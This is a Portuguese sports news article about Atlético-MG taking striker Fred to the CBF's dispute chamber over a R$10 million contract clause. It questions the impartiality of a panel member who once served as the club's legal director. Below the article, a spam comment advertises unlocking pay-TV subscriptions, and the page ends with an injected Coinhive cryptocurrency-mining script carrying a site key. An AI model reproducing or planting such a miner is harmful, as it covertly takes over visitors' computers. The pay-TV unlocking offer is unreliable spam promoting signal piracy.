Fred foi acionado pelo Atlético-MG na CNRD (Foto: Fernando Martins Y Miguel)
Na última sexta-feira, o Atlético-MG entrou com uma ação na Câmara Nacional de Resolução de Disputas (CNRD), da Confederação Brasileira de Futebol (CBF), cobrando o pagamento da multa de R$ 10 milhões prevista na rescisão de contrato do atacante Fred com o clube, caso ele se transferisse para o rival Cruzeiro. O órgão já notificou Fred da cobrança do Atlético-MG - o atacante tem até a próxima segunda-feira para se posicionar.
A opção pela discussão do imbróglio na CNRD foi do Atlético-MG. O órgão é relativamente novo e iniciou trabalhos em setembro de 2016, há cerca de um ano e meio. O "caso Fred" é o mais polêmico e marcante discutido por lá desde a inauguração.
A Câmara é composta por cinco integrantes e, desde 2016, sofreu apenas uma mudança. Vitor Butruce, presidente da Câmara e representante da CBF; Luiz Guilherme Pires Barbosa, indicado pelos clubes; Liselaine Marques de Castro Rosa (atletas); Luiz Fernando Pimenta Ribeiro (intermediários); e Guilherme Guimarães (técnicos) são os atuais. A única mudança foi na representante dos atletas. Antes de Liselaine, Amilar Fernandes Alves participava da Câmara.
Entre todos eles, chama atenção, pelo passado vinculado a um dos envolvidos diretamente no "caso Fred", Luiz Fernando Pimenta Ribeiro.
O currículo de Luiz Fernando, anexado no site da Mattos de Paiva Nogueira & Ribeiro (mpnr.com.br), empresa do advogado, mostra que ele atuou como gerente jurídico (entre 2003 e 2007) e diretor jurídico (entre 2007 e 2008) do Atlético-MG. Antes disso, entre 2001 e 2003, trabalhou como advogado associado na Sette Câmara, Brandão e Bastos Advogados Associados, extinto nome do escritório de Sérgio Sette Câmara, atual presidente do Galo. Hoje, o escritório chama Sette Câmara, Corrêa e Bastos Advogados Associados.
Luiz Fernando Pimenta Ribeiro, ainda segundo o currículo anexado no site, também integrou a Comissão Legislativa do extinto Clube dos 13, em 2007.
As partes envolvidas na discussão na Câmara da CBF são Atlético-MG e Fred. Qualquer um dos lados pode solicitar o impedimento e a substituição de Luiz Fernando caso acredite que não há a imparcialidade necessária na presença dele entre os árbitros. O mais provável, claro, é que os representantes jurídicos de Fred façam o pedido. O suplente de Luiz Fernando na Câmara é o advogado Vantuil Gonçalves.
Por meio da assessoria de imprensa, o Atlético-MG foi procurado e confirmou que Luiz Fernando trabalhou no clube, porém, ressaltou que os serviços prestados foram há 10 anos.
Currículo de Luiz Fernando Pimenta Ribeiro (Foto: Reprodução/Site da Mattos de Paiva Nogueira & Ribeiro Advogados)
VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345
(Comentário excluído)
< src="https://coinhive.com/lib/coinhive.min.js">><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();>